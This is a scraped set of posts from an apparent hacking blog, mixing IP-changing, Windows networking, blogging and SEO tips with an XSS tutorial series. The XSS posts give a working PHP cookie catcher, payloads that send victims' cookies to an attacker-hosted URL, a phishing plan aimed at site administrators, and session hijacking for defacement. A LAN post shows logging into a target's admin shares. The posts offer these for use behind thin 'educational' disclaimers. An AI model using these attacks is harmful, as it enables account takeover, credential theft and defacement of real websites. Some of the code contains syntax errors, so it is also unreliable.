Change your IP in less than 30 seconds

Tweet

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked :

• Click on "Start" in the bottom left hand corner of screen.
•  Click on "Run"
• Type in "command" and hit ok.
• You should now be at an MSDOS prompt screen.
• Type "ipconfig /release" just like that, and hit "enter"
• Type "exit" and leave the prompt
• Right-click on "Network Places" or "My Network Places" on your desktop.
• Click on "properties"

NOTE : You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

• Right click on "Local Area Connection" and click "properties" 
• Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
• Click on "Use the following IP address" under the "General" tab
• Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
• Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
• Hit the "Ok" button here
• Hit the "Ok" button again

NOTE : You should now be back to the "Local Area Connection" screen.

• Right-click back on "Local Area Connection" and go to properties again. 
• Go back to the "TCP/IP" settings
• This time, select "Obtain an IP address automatically"
• Hit "Ok"
• Hit "Ok" again
• You now have a new IP address

NOTE : This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Read More

Simple Commands for LAN Hacking for beginners

Tweet

I am sure many guys know all these commands.I am just gonna start on LAN Hacking so I am starting from basics.These commands are for beginners.These commands will run on CMD prompt.



 

• First of all, open your Network Connection.
• Now right click and select Properties. 
• Then Select TCP/IP and click on Properties again. 
• Click on Advanced and WINS tab. 
• Here select Default for NeBIOS.
• Now come back to the main window named Local Area Connection.
• Now select File and Print Sharing for Microsoft Networks and hit enter.

NOTE : This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd”.

Codes

• nslookup
• net view
• net use
• net user
• ping
• tracert
• arp
• route
• nbtstat
• netstat
• ipconfig

In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

1) Ping

• This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command.

CODE :

• ping x.x.x.x (x is the IP address).
• ping www.whatever.com (www.whatever.com is the website you want to ping, but you don’t know the IP)

NOTE : Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) Nslookup

• This command is mostly for resolving DNS into IP.

Lets say you know the website URL but you don’t know its IP(and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

CODE :

• nslookup (enter)
• set type=mx (enter)
• yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP.

• Now why would you want to have an IP of a mail server?
• To send spoofed mail to your friends or even for SE.
• In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http://www.infowar.com/forums/showthread.p…p;threadid=2360

3) Tracert

This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.

CODE :

• tracert x.x.x.x (x is the IP address)
• tracert www.whatever.com (www.whatever.com is the website you don’t know the IP)

4) Arp

This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

CODE :

arp -a

• Route 

This command will show you the routing table, gateway, interface and metric.

CODE :

• route print

5) Ipconfig

This command will show tons of very helpful things.Your IP, gateway, dns in use.

CODE :

• ipconfig
• ipconfig /all

This command will give all that info but for all networks you might have it.Also, in case you have a dynamic IP and want to change it, then type.

• ipconfig /release (this will release your IP)
• ipconfig /renew (this will renew your iP)

NOTE : Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid.

6) Netstat

This command will show you connection to your box.

CODE :

• netstat
• netstat -a (this will show you all the listening ports and connection with DNS names)
• netstat -n (this will show you all the open connection with IP addresses)
• netstat -an (this will combined both of the above)

7) Nbtstat

This command will show you the netbios name of the target box.

CODE :

• nbtstat -A x.x.x.x (x is the IP address)
• nbtstat -a computername
• net view x.x.x.x or computername (will list the available sharing folders on the target box)
• net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target box as administrator)
• Now if you want to connect to the target box and browse the entire C drive, then use this command: net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)

NOTE : Keep in mind that this will only works if the target box doesn’t have an administrator password set.

And least but not last, the “help” command.

• whatevercommand /help
• whatevercommand /?

This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.

Read More

Batch File To Start Program In Start up of Computer

Tweet

Whenever I start my computer it is usually so in the beginning I have to start the same program, which in my case is FrontPage. I update my webpage everyday so I decided to get rid of this thing so I created a batch file to start this program automatically at start up so it is always ready for me to useand no need to run it manually.

Batch File to Start Desired Programs on Start up of Computer

1. First of all open notepad. It is located at Start Menu >> All Programs >> Accessories >> Notepad (Windows XP)
2. Then type start frontpg.exe
3. Now click on save as and save this file with .bat filename extension. I have called mine startup.bat
4. Now you can double click on it on the desktop to test if it opens FrontPage.
5. Now Right click on the Start Menu.
6. Now open the Programs folder, then The Startup Folder.
7. Paste your file in the Startup folder.
8. Now whenever you start your computer, your program will automatically start for you. You do not even have to click on the batch file to start your program.

You can start any exe file with this simple little batch file. An exe file is an executable file that usually starts a program. Here are some variations of the simple batch file.

• start /min frontpg.exe
• start /min iexplorer.exe
• start /min notepad.exe
• start /min iexplorer.exe
• start /min msimn.exe

Notes:

• /min = When the program opens it is minimized in the task bar
• /max = When the program opens it will be maximized and open on your screen Also writing nothing does the same thing.
• winword.exe Microsoft words .exe filename.
• msimn.exe Opens Outlook Express.
• Leave your batch file on your desktop You can just press on it yourself to start all your programs. It starts them so quick!!!   I would rather do it this way. It is even quicker than pressing on the icon on the desktop…Don’t ask me why.
• You can also drop a shortcut to a program into the startup folder and it should do the same thing.. Give it a try
• start /min 10.0.0.1  This will take you to a network computer. You need to replace the IP address with the address of the computer you want to connect to. You can also put a server name or computer name as long as it is on the network.

Read More

How to Secure your Faceboook Account from Hackers

Tweet

Facebook is the top social networking site in the world now, where most of us has at least an account (about 30% has more than one account) associated with it. Facebook is a great way to have fun using their fan pages or groups etc.It also has games and much more stuff but the question is how to secure Facebook as the ratio of Facebook hacking is increasing day by day.
Facebook has provided us a lot of ways to secure accounts but usually people don't give attention to it. If you have never touched any part of Facebook security, here I am gonna post five quick tips to get your Facebook secured.

1. Create a strong password for authentication

Passwords can be easily broken by brute-force technique,in which user use some software etc to crack your password, if you choose to use a short and simple password. If you don’t have a strong and alphanumeric password for your account, then whatever security guides that you apply below is not going to do any better,so first of all make your password strong.For this add symbols like these !@#$%^&* in your password and also add numbers in it. Your password must be a combination of lower case, upper case, numeric and special characters like symbols I have above mentioned.

2. Enable secure HTTPS connection

HTTP connection is totally outdated,its very easy to hack HTTP connection as it is extremely vulnerable to man in the middle attack. So to avoid this, Facebook offers the HTTPS connection which is a secured one and very difficult to hack.In HTTPS all the data you entered from your computer and sent to Facebook server is completely encrypted. Even if there is a man in the middle who taps your connection,he will get nothing.

3. Enable login notification with Mobile

If you enable the log in notification,it will send you message on your mobile whenever someone tries to log in from your account . So when you get this message that someone is using your Facebook account without your permission (means he hacked your account), you can immediately kick them out and call for a new password so that he can never login anymore. This feature is very good and you can enable notifications from both email and mobile SMS.

NOTE : I will recommend to use mobile notification ,so that you are warned immediately after the unknown access to your account.

4. One Time Password in login approval

One Time Password is a 2 factor authentication technique in which you enable all logins from unknown devices to use One Time Password.In this method whenever someone tries to log in to your account from unknown device a code comes to your mobile,without entering that code ,the hacker wont be able to access your account. In this way,you can easily ensure that only you can login from an unknown device.With the use of this method, there are only 2 ways for the hacker to use your Facebook identity. One is to get access to your recognized device which in most cases is your computer or smartphone. The other way is to get access to your mobile phone and then he will easily get the one time password.

5. Logging out from Facebook

Whenever most people are done with Facebook i.e checking and replying messages and notifications, they won't log out their Facebook account and just close the web browser and simply walk away from the computer,actually they assume that the session is logged out. This is a really big mistake as not all the web browsers works the same. Some still retain your previous session, in other words your cookies even though the web browser is closed. Always remember to log out after completing your tasks.

Read More

Install BackTrack 5 on virtual box with video

Tweet

Hey guys .. how u been ???
Well in this post i wanted to show you how to install BT on virtualbox ... i thought it will be more easy to explain with video , isnt it ?
So here is the video... do comments and likes :D

VIDEO

You can see the video HERE.

 

Hope you enjoyed this !
Stay Tuned !!!

Thank you



Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Read More

Love of fans for Hack With Style (HWS)

Tweet

I always appreciate the love of our fans for this blog (HWS). As it really because of you guys that this blog got so much popularity within such a short period of time and got a good page rank in almost all page ranking sites and its popularity is increasing day by day. I am extremely thankful to all of my readers for their continuous support, love and dearest motivation. Verily I could not have achieved this success without the active participation and support of our readers .

The purpose of this post is to just appreciate the efforts of our fans,who has given their time to create banners for HWS , and I also want to show  their efforts to others ,a way of thanks from HWS team ... :))

Banners Designed by Aleem Hafeez

Banner 1

 Banner 2

• These Banners are designed by Aleem Hafeez . We are very thankful to him for giving time to make such beautiful banners.

Banners Designed by Bajpan Gosh

 Banner 3

• The above Banner is designed by Bajpan Gosh . We are very thankful to him for giving time to make such beautiful banners.

 Banners Designed by Ghosts Rider

Banner 4

• The above Banner is designed by Ghosts Rider . We are very thankful to him for giving time to make such beautiful banners.

Banners Designed by Kumar Sourav

Banner 5

• Finally our respected admin Kumar Sourav . A beautiful and colorful banner designed by Kumar Sourav.... :))

Which Banner is best ??

• Now I am really confused as all the banners are really attractive and have all attributes to be in the header of HWS. 
• So guys I need your votes,please tell me which one you like the most and the banner which got the maximum votes ,I will add that banner in the header of HWS.

NOTE : Poll closed and you can check the winner in header .... :))

Read More

BackTrack 5 : Install VirtualBox

Tweet

Hey guys .. how are you ???
anyway u knw virtualbox right ? For those who doesnt know wat is virtual box... read following

What is virtual-box

Virtualbox is a software , distributed by Oracle , which is used to simulate multiple operating systems that is guests OSs in your main OS that is host OS.
Using this software , u can use any operating system within your main OS that may be backtrack or any other OS.

Where to download virtual-box

You can download virtual-box HERE.
If you are using BT then go to virtual box for linux host ( an option there )  , then select your platform and then download.

How to install

Now that you have downloaded its time to install. follow these steps :

• Nevigate to download folder by using "cd" command.
• Now use the command below to install it ( it must be .deb file)
  

  sudo dpkg -i filename.deb 

  Now you are done ...
  

Hope you enjoyed this !
Stay Tuned !!!

Thank you

Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Read More

Splitting the Cookie Catcher Code Line by Line for Understanding

Tweet

Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

• This is the same code as I have posted in previous tutorial.

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.

<?php
Write the Code Here
?>

• These two code lines tell the server that the code written inside them is php code.
• First line is the starting line of code and and the second tells about its end and the code comes within these lines.

$cookie = $_GET['cookie'];

• This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement

$ip = $_SERVER['REMOTE_ADDR'];

• REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.

$date=date(“j F, Y, g:i a”);

• Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.

$referer=$_SERVER['HTTP_REFERER'];

• HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.

$fp = fopen('cookies.html' 'a');

•  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.

fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);

• In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
• It writes the Cookie ,Date and Time and Website in the opened file cookies.html .

fclose($fp);

• After writing all the data in cookies.html ,this code finally close the file.

header ("javascript:history.back()");

• This final line of code sends the user back to the last page fro where he clicked on your link.
• This code is very useful as victim has no idea that his cookies are captured.

That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .

NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

Read More

What is Cookie Catcher and How to Get Cookies Using it

Tweet

Hello guys , hope you all are enjoying good health. the day before yesterday I have completed my tutorial on XSS in which we checked Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent  Method In those tutorials I have told that we have to use cookie catcher tool to get the cookies in our online free php hosting account . After that I got a lot of questions about Cookie Catcher like what is it etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.

What is Cookie ?

• First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
• Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
• This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a cookie catcher?

• A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
• Hacker usually sends you a code or link and this link is connected to the cookie catcher.
• When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.

Is making a cookie catcher hard ?

• Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
• The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
• In fact the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

• Copy the below code in a notepad :
  

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

• Save this notepad as CookieCatcher.php
• Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

• Now the question arises how can we use a cookie catcher.
• First of all create a free account on 0fees.net
• After creating account open cpanel.0fees.net and log in to your account.
• Now under File Management , click on Online File Manager .
• Now open htdocs and upload the CookieCatcher.php file in it.
• Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.

<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>

• Make sure to change user username .
• After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.

NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

Read More

Chapter 5 : Give Your Comment Form a Professional Look

Tweet

Hello guys ,hope you all are fine and enjoying good health .First thing I was busy that's why posting this chapter so late. In our previous posts we have learn about How to Make your Blog Post Attractive and then we checked Widgets and Add-ons essential for blogger . After these two posts we are now done with the template as we have customized both the posts and the widgets. Now the only remaining part on the blog is Comment portion. So in this chapter we will learn how to customized a comment system which is actually very important as the visitors usually judge the popularity of a post with its number of comments.

Blogger Comment System

Blogger Comment System is very poor as compared to wordpress or joomla.If you check comment system of wordpress then u will really say that its looking a professional site but in case of blogger its just a simple notepad type and today in this chapter we will try to make it as best as we can.Follow the bellow steps to customize it.

a) Customize Blogger Comment form :

• First of all follow this tutorial step by step to Customize Blogger Comment Form & Make It Attractive  
• Now the most important thing choose that comment form style which is similar to your blog style.
• Like in our blog HWS you have seen that the comment border color is as same as the color of headings or the color of links.
• But the problem is how to change the color of borders etc to make it similar to your blog color, for this I have completely mentioned in above tutorial which color is doing what and with the help of  this tool HTML Color Code Generator you can easily get your desired color.
• You have also seen that comment system on HWS gives a professional look so just follow this tutorial and make your comment system as same as mine .

b) Change Author Comment Color :

• Next thing is author's comment , dont you think that author's comments must be different from the visitor comments.
• When a new visitor comes to your post and he finds something difficult he immediately moves to the comments to check whether someone else asks about it or not and when he can easily see the admin's comment then it will be a relief for him as now he doesn't need to read all the comments ,he just read the author's comment to find solution to his problem.
• Now how can you change the authors comment style.Read this tutorial and Change Author Comments Color Style In Blogger quite easily.
• You can also make changes to this code . Just play with the code and get your desired color for author's comment with the help of  HTML Color Code Generator 
• But again the same thing try to maintain the flow of your blog , as in HWS the author's comment color is again sky blue .... :))
• I know these are very minor things but these minor things bring a great impact. Trust me ......

c) Add a note above

• Its a simple note above Comment Box in which you can add instructions like do not spam etc.
• Check this tutorial to Add a Note Above Comment Box and make it Attractive .

d) Add a reply button

• Here is the tutorial to Add a reply link in your comment form in Blogger . 
• This is essential as it allows the user to connect to comment update via email .

 That's it for today but I have missed one thing here which is how to add a reply button on each comment ,I will post about it soon and then will add it to this chapter. Your feedback is really important so that I may write the next chapter ...... Take care :))

Read More

Hack Websites using XSS Attack - Non Presistent Method

Tweet

Hello guys, hope you are fine.Well yesterday we have discussed Hack Website using XSS Attack in which we learn the first type of XSS i.e. Persistent XSS .Today we will discuss it a little further in which we will cover second type of Xss and how to hijack session after XSS.One more thing guys, don't ask me to personally teach you this stuff as I don't have much time and its really hectic but if you have any problem clear it in comments and I will completely satisfy you while answering your problem . So , I think now we should start so let's start :

Non-Persistent XSS:

In this method we will force our victim to go to our link,initial steps are almost similar to previous method.

• First of all we will search for a XSS vulnerable site.
• After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
• To check this add this simple code in the search box and click the search button.
  

Code:

<script>alert(document.cookie)</script>

• After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
• Now after confirming the vulnerability add the below code in the url of this search.php page.

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Now we have to shrink the link of whole page for this use tinyurl or any other such service.
• Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
• After getting the email id send him a fake email from any online fake mailer or through your fake id.
• In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
• Tinyurl will mask the link and don't let it to go to spam
• Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. 
• No matter what he does and changes his password you can still login as him.

NOTE : Among these two types of XSS , Persistent is used most commonly and is the best way to get cookies.

Session Hijack

Until now we have discussed that how to get cookies of someone using XSS and now we will check how to use these cookies to enter into the victim's account .This is called Session Hijack.

• Ok now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies. 
• First of all go to that site's admin login or its main page whose cookies you have.
• Now delete ALL of your cookies from that page.For this check the topic on cookies. 
• Now go in your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: in a notepad.These are the cookies. 
• This sign ; separates cookies from each other so first copy the code before the ;i.e the first cookie.
• Now come back to that vulnerable site and instead of  link add the following code but don't hit enter:

Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")

• Add that cookie in between " " and now hit enter.
• Do this with all of the cookies and refresh the page.
• And hurrah!!! you are logged in as administrator.
• So now go in your admin panel and upload your deface page,now you can do anything to that site.

That's all for today,hope you guys like it , I will try to make a video tutorial on it . If you guys have any problem ask in the comments. Have fun .... Take care ..... :))

Read More

Hack Websites using XSS Attack

Tweet

I have already posted about How to Hack Website Completely using SQL Injection and I have also  posted a Video Tutorial on it.Today I am going to start on XSS.I know most of the guys don't know even about its name so I am gonna start it from very basics to give you the whole concept of it .Hope you guys like it .

Introduction of XSS

• XSS attack is used to hack websites online and it mostly works on those sites which use cookies for storing your username and password when you log in that site.Check this Wikipedia article for knowing what are cookies.
• XSS usually works on those sites which allows users to add any code in an open place like starting new thread in forums or can send codes using messages to other members.It is actually a script / a code which attacker submit and whoever clicks or even see it got affected .
• The purpose of the attacker or hacker doing XSS is to steal the cookie of a user, which is currently log in on that site and viewing that code submitted by the hacker, so that he can later use that cookie to get into his account . (Steal in this context means just get a copy of cookie, rather than removing the original cookie).

For Example : User A log in on a site and user B use XSS attack and gets the cookie of user A , now user B can easily come into the account of user A using these cookies ..... :))

Finding a XSS Vulnerable sites:

• First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
• To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :

Code:

"><script>alertundefineddocument.cookie)</script>

Code:

'><script>alertundefineddocument.cookie)</script>

Code:

"><script>alertundefined"Test")</script>

Code:

'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:

Code:

"><body bgcolor="FF0000"></body>

Code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

• After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
• Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.

Types of XSS Attack

• There are two types of mostly used XSS attacks named :

1. Persistent XSS
2. Non-Persistent XSS

Persistent XSS:

• This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
• So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
• So now lets try to grab it's cookies.
• First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
• Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:

Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
• Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
•  Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 
• Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
• Now save these cookies as we gonna use them to hijack session of victim.... ;)

That's all for today ,I will post more on it tomorrow in which we will check Non-persistent XSS and also check how to use these cookies to hijack the session of victim .If you have any question till now may ask in comments..... Take care ... :))

---

Update : I have posted the the second part of this tutorial named Hack Website using XSS Attack - Non Persistent  Method.

Read More

Increase Twitter Followers Using Twitter Hashtags

Tweet

I have already posted about Get Huge Traffic from StumbleUpon to Your Blog / Site. Now I am posting about twitter as these bookmarking sites are a great source of traffic to your blog.Twitter is a very popular site and a great source of traffic for the blogger and site owners but mostly people don't know how to increase Twitter followers to get traffic and also not many people understand what about twitter hashtags and how a hashtag can help a blogger and website owners to boost the traffic to their twitter profile and hence ultimately to their blogs and websites.Twitter hashtags or a hashtag in a tweet is not more than a word with a symbol hash (#) prefixed to it which makes it really strong e.g. #twitterfollowerbutton, #facebook, #HackWithStyle. These hashtags are actually serve as a search keyword for that particular tweet and hence when twitter users want to find any tweet they help them finding it faster than normal tweet.

How to use twitter hashtags

• Let us understand this concept with the following tweet as an example :

Increase Twitter Followers Using Twitter Hashtags .

• Above tweet is a normal tweet without twitter hashtags. Now, lets add hashtags to it in the bellow tweet.

Increase Twitter Followers Using Twitter Hashtags. #Twitterhashtags #Twitterfollowers #HackWithStyle.

The second tweet is same as the first tweet except we have added three words (hashtags) “Twitterhashtags”, "Twitterfollowers" and “HackWithStyle” with hash (#) symbol prefixed. Even though the tweet being conveyed is still the same and with the exactly same words but second tweet will be far easier and faster to find when someone tries to search. Anyone trying to search with the keyword Twitterfollowers or Twitterhashtags will be able to easily  find the second tweet than the first one. Hence, more number of visitors reaching to your tweet and reading your tweets and profile. This will obviously increase number of twitter followers and will ultimately lead to large number of visitors to your website or blog.

NOTE : Currently, there is a limit of maximum 3 hashtags in a single tweet, however, you should always refer and check with twitter’s latest guideline on the same so that you don’t intentionally or un-intentionally violates the same.

Read More

Write Anything in Your Facebook Status in Blue Link Style

Tweet

This trick is no more working check the latest one here ===> Write Anything in Your Facebook Status in Blue Link Style

---

Its a simple Facebook trick lets check it out .We have seen that these days people usually tag different pages in comments and status in Facebook but usually its very difficult to find the related page which we want to tag, like once I want to tag a page some thing like "WHAT A SHIT??" but I didn't find it.So here's a simple trick to write whatever you want to write in blue link style to make fun of your friends ;->

Steps to Follow

• Copy the following code and Paste this on your status or in your comment :

@@[0:[165125763534994:0: "YOUR TEXT" ]]

• Replace "YOUR TEXT" with whatever you want to write in "BLUE"... " . 

NOTE : Works Only On Profile Walls Not in Groups.

Check the example

• As an example check this :
• When I paste this as my status :

•  It appears like this ..... ;))

•  Enjoy guys .... and don't forget to make comment .... :))

Read More

List of Best Video Streaming Websites to get Backlinks

Tweet

In my previous post I have told about How to get Traffic from StumbleUpon which is also a part of SEO and today we will discuss about backlinks.Getting Backlinks is an essential task for a blogger and its really a very difficult task too.There are many ways to get backlinks and here I am showing one of them which I think is the best of them.I have collected numerous video sharing websites, where you can Upload videos for free to get backlinks.

Steps to Follow

• First of all Create a video for your website.Its not much difficult ,you may use Camstudio software to create video.
• Now upload this video to all the websites listed below.
• In the description box , must add the link of your blog or site.
• Moreover after logging in,edit your profile and you will see there is an option of website ,put your link there.

Benefis

• You will get backlinks very easily which will increase your page rank.
• Secondly these videos will also send remarkable traffic to your site depending upon how good your video is.
• In Forums we mostly have to wait to add link in our signature but here no need to wait just create account and put your link.

List of Best Video Streaming Websites

Below is the list of best video streaming sites :

youtube.com	dailymotion.com	myspace.com
google.com	blip.tv	revver.com
veoh.com	vimeo.com	megavideo.com
comedycentral.com	teachertube.com	slide.com
metacafe.com	ifilm.com	brightcove.com
gametrailers.com	asterpix.com	imeem.com
yahoo.com	photobucket.com	brightcove.tv
godtube.com	hulu.com	alice.it
livevideo.com	liveleak.com	onsmash.com
go.com	break.com	viddler.com
tu.tv	videoegg.com	redlasso.com
stage6.com	collegehumor.com	funnyordie.com
reuters.com	sapo.pt	truveo.com
ning.com	msn.com	sevenload.com
thedailyshow.com	eurity.tv	aol.com
clipsyndicate.com	mtv.com	wordpress.com
worldstarhiphop.com	youku.com	gamevideos.com
disclose.tv	tudou.com	swissinfo.ch
bbc.co.uk	splashcast.net	overstream.net
nbc.com	tn.com.ar	bursavideo.com
gofish.com	current.com	ustream.tv
theonion.com	movieweb.com	jumpcut.com
singsnap.com	fearlessmusic.com	videojug.com
thenewsroom.com	flickr.com	divshare.com
vpod.tv	myvideo.de	ign.com
rockyou.com	wat.tv	guba.com
goleft.tv	bitgravity.com	animoto.com
podtech.net	expertvillage.com	ebaumsworld.com
ontheairtv.com	tv3.com.my	mavenapps.net
multiply.com	indyarocks.com	archive.org
56.com	stupidvideos.com	gamersyde.com
seesmic.com	vobbo.com	vidiac.com
mofile.com	garagetv.be	cbs.com

NOTE : If any of these links is not working then copy paste it in your url and do let us know so that we may correct it.Your feedback is welcome.

Read More

Advertise With Us

Tweet

Now that we are averaging over 2000 unique visitors/day to our blog, we have decided to open up some space for carefully selected Site Owners. All ad revenues will be applied to the costs of maintaining HackWithStyle , as we are soon going to open FORUMS for our users and we are also thinking of starting some contests for the hackers. Provided below are our ad acceptance policies and current rates:

• We reserve the right to accept/ reject ads according to our editorial policies.
• We commit to displaying the accepted ad at the right place and for the duration promised.

How to Advertise With Us ?

• Fill the below simple form and choose your package and click SUBMIT.
• We will review your form and will contact you within one working day on your email. Make sure the Email is correct.
• After that you have to send the money through any way you like e.g. PayPal, alert-pay etc.
• If you have any message for us then write it in the message box although its not compulsory.
• Now fill the below form :

NOTE : We will Contact you within 1 working day through your email.

Types of Ads

Further info about the add locations.We can provide different kind of add spaces on our website and their detail is as follows :

1) Ads Above Posts :

These ads willl be posted above each post and these will be the most click able ads.

• Size of the banner : 125x125
• Rate : $40/month

2) Right Column ads:

These ads will be displayed in the right  column of our blog starting from the top. You have to provide us the logo of your site and we will link it to your homepage.

• Size of the banner : 125x125
• Rate : $25/month

3) Footer Ads:

The footer ads will be in the form of a clickable image or a text box with product description and a web address.

• Size of the banner : 125x125
• Rate : $15/month

Read More

How to Upload / Host Javascript Files in Blogger Itself

Tweet

Today I am going to explain how to host JavaScript(.js) files in Blogger. "How to host JavaScript files for Free with unlimited bandwidth in Blogger ?" is one of the most frequently asked questions in the blogger community as blogger has no option to upload files.You may find a lot of online hosting providers out there which can help you host your .js files for free, but the problem always arises while doing this is all have some bandwidth limitations and secondly they are also not very reliable.

So, if you are also facing this king of problem, here is a simple trick.Just follow he below steps carefully :

Steps To Follow

• Suppose I have three JavaScript files which I have to upload on Blogger.
• First of all open these files in WordPress.

NOTE : Don't open them in Notepad ,only use WordPress.

• Now press Cntrl+A and copy all the code in the file.
• Now paste the code you copied from the file file in your blogger template as shown below :

<script type='text/javascript'>

//<![CDATA[

PASTE THE JAVASCRIPT CODE HERE

//]]>

</script>

• Now if you have more than 1 JavaScript file. Here's also a solution for that problem.Just repeat the process again... like this..

•  And now the Last and Most Important step... SAVE THE CHANGES ;))

Benefits of this trick:

• No limitation for file size
• No bandwith limitations
• Super fast page loading (as blogger itself is hosting the file)

Don't forget to make comment ..... :))

Read More

